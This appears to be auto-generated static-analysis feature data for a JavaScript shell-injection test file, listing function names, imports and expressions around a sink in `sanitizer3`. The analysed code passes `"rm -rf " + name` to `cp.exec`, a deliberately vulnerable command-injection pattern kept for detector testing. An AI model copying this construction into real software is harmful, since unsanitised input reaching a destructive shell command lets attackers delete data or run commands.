Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:10:406:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:10:406:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:10:406:18 | "rm -rf " | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:10:406:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:10:406:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:10:406:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:10:406:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:10:406:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:10:406:25 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:10:406:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:10:406:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:10:406:25 | "rm -rf " + name | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:10:406:25 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:10:406:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:22:406:25 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:22:406:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:22:406:25 | name | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:22:406:25 | name | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:22:406:25 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:22:406:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:6:408:14 | sanitized | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:6:408:14 | sanitized | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:6:408:14 | sanitized | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:6:408:14 | sanitized | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:6:408:14 | sanitized | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:6:408:42 | sanitiz ... r(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:6:408:42 | sanitiz ... r(name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:6:408:42 | sanitiz ... r(name) | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:6:408:42 | sanitiz ... r(name) | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:6:408:42 | sanitiz ... r(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:6:408:42 | sanitized | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:6:408:42 | sanitized | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:6:408:42 | sanitized | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:6:408:42 | sanitized | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:6:408:42 | sanitized | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:18:408:36 | yetAnohterSanitizer | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:18:408:36 | yetAnohterSanitizer | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:18:408:36 | yetAnohterSanitizer | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:18:408:36 | yetAnohterSanitizer | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:18:408:36 | yetAnohterSanitizer | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:18:408:42 | exceptional return of yetAnoh ... r(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:18:408:42 | exceptional return of yetAnoh ... r(name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:18:408:42 | exceptional return of yetAnoh ... r(name) | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:18:408:42 | exceptional return of yetAnoh ... r(name) | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:18:408:42 | exceptional return of yetAnoh ... r(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:18:408:42 | yetAnoh ... r(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:18:408:42 | yetAnoh ... r(name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:18:408:42 | yetAnoh ... r(name) | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:18:408:42 | yetAnoh ... r(name) | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:408:18:408:42 | yetAnoh ... r(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:2:409:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:2:409:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:2:409:3 | cp | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:2:409:3 | cp | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:2:409:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:2:409:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:2:409:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:2:409:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:2:409:8 | cp.exec | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:2:409:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:2:409:31 | cp.exec ... itized) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:2:409:31 | cp.exec ... itized) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:2:409:31 | cp.exec ... itized) | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:2:409:31 | cp.exec ... itized) | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:2:409:31 | cp.exec ... itized) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:2:409:31 | exceptional return of cp.exec ... itized) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:2:409:31 | exceptional return of cp.exec ... itized) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:2:409:31 | exceptional return of cp.exec ... itized) | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:2:409:31 | exceptional return of cp.exec ... itized) | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:2:409:31 | exceptional return of cp.exec ... itized) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:5:409:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:5:409:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:5:409:8 | exec | enclosingFunctionBody | name cp exec rm -rf name sanitized yetAnohterSanitizer name cp exec rm -rf sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:5:409:8 | exec | enclosingFunctionName | sanitizer3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:5:409:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:10:409:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 